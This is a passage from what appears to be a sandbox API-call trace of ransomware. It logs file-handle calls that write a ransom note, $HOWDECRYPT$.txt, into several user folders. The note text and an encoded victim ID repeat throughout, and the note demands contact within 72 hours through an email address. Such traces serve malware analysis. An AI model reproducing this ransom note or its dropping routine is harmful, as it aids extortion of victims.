dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.974] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.974] WriteFile (in: hFile=0x178, lpBuffer=0x248ecff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee28, lpOverlapped=0x0 | out: lpBuffer=0x248ecff*, lpNumberOfBytesWritten=0x248ee28*=0x127, lpOverlapped=0x0) returned 1 [0152.975] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.975] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee28, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee28*=0x2ac, lpOverlapped=0x0) returned 1 [0152.975] CloseHandle (hObject=0x178) returned 1 [0152.975] GetProcessHeap () returned 0x2c0000 [0152.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f398f0 | out: hHeap=0x2c0000) returned 1 [0152.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.975] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.976] WriteFile (in: hFile=0x178, lpBuffer=0x248ecfb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x248ecfb*, lpNumberOfBytesWritten=0x248ee24*=0x127, lpOverlapped=0x0) returned 1 [0152.976] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.976] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee24*=0x2ac, lpOverlapped=0x0) returned 1 [0152.977] CloseHandle (hObject=0x178) returned 1 [0152.977] GetProcessHeap () returned 0x2c0000 [0152.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c130 | out: hHeap=0x2c0000) returned 1 [0152.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.978] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.978] WriteFile (in: hFile=0x178, lpBuffer=0x248ecf7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee20, lpOverlapped=0x0 | out: lpBuffer=0x248ecf7*, lpNumberOfBytesWritten=0x248ee20*=0x127, lpOverlapped=0x0) returned 1 [0152.979] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.979] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee20, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee20*=0x2ac, lpOverlapped=0x0) returned 1 [0152.979] CloseHandle (hObject=0x178) returned 1 [0152.979] GetProcessHeap () returned 0x2c0000 [0152.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf178 | out: hHeap=0x2c0000) returned 1 [0152.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\swd\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.980] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.980] WriteFile (in: hFile=0x178, lpBuffer=0x248ecf3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x248ecf3*, lpNumberOfBytesWritten=0x248ee1c*=0x127, lpOverlapped=0x0) returned 1 [0152.981] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.981] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee1c*=0x2ac, lpOverlapped=0x0) returned 1 [0152.981] CloseHandle (hObject=0x178) returned 1 [0152.981] GetProcessHeap () returned 0x2c0000 [0152.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf030 | out: hHeap=0x2c0000) returned 1 [0152.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\spn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.981] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.981] WriteFile (in: hFile=0x178, lpBuffer=0x248ecef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee18, lpOverlapped=0x0 | out: lpBuffer=0x248ecef*, lpNumberOfBytesWritten=0x248ee18*=0x127, lpOverlapped=0x0) returned 1 [0152.982] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.982] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee18, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee18*=0x2ac, lpOverlapped=0x0) returned 1 [0152.982] CloseHandle (hObject=0x178) returned 1 [0152.983] GetProcessHeap () returned 0x2c0000 [0152.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbeee8 | out: hHeap=0x2c0000) returned 1 [0152.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\prt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.983] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.983] WriteFile (in: hFile=0x178, lpBuffer=0x248eceb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x248eceb*, lpNumberOfBytesWritten=0x248ee14*=0x127, lpOverlapped=0x0) returned 1 [0152.984] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.984] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee14*=0x2ac, lpOverlapped=0x0) returned 1 [0152.984] CloseHandle (hObject=0x178) returned 1 [0152.984] GetProcessHeap () returned 0x2c0000 [0152.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbeda0 | out: hHeap=0x2c0000) returned 1 [0152.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\nrw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.985] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.985] WriteFile (in: hFile=0x178, lpBuffer=0x248ece7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee10, lpOverlapped=0x0 | out: lpBuffer=0x248ece7*, lpNumberOfBytesWritten=0x248ee10*=0x127, lpOverlapped=0x0) returned 1 [0152.986] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.986] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee10, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee10*=0x2ac, lpOverlapped=0x0) returned 1 [0152.986] CloseHandle (hObject=0x178) returned 1 [0152.986] GetProcessHeap () returned 0x2c0000 [0152.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbec58 | out: hHeap=0x2c0000) returned 1 [0152.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\itl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.986] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.987] WriteFile (in: hFile=0x178, lpBuffer=0x248ece3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x248ece3*, lpNumberOfBytesWritten=0x248ee0c*=0x127, lpOverlapped=0x0) returned 1 [0152.987] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.987] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee0c*=0x2ac, lpOverlapped=0x0) returned 1 [0152.987] CloseHandle (hObject=0x178) returned 1 [0152.988] GetProcessHeap () returned 0x2c0000 [0152.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbeb10 | out: hHeap=0x2c0000) returned 1 [0152.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\grm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.988] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.988] WriteFile (in: hFile=0x178, lpBuffer=0x248ecdf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee08, lpOverlapped=0x0 | out: lpBuffer=0x248ecdf*, lpNumberOfBytesWritten=0x248ee08*=0x127, lpOverlapped=0x0) returned 1 [0152.989] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.989] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee08*=0x2ac, lpOverlapped=0x0) returned 1 [0152.989] CloseHandle (hObject=0x178) returned 1 [0152.989] GetProcessHeap () returned 0x2c0000 [0152.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe9c8 | out: hHeap=0x2c0000) returned 1 [0152.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\frn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.990] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.990] WriteFile (in: hFile=0x178, lpBuffer=0x248ecdb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x248ecdb*, lpNumberOfBytesWritten=0x248ee04*=0x127, lpOverlapped=0x0) returned 1 [0152.991] lstrlenA 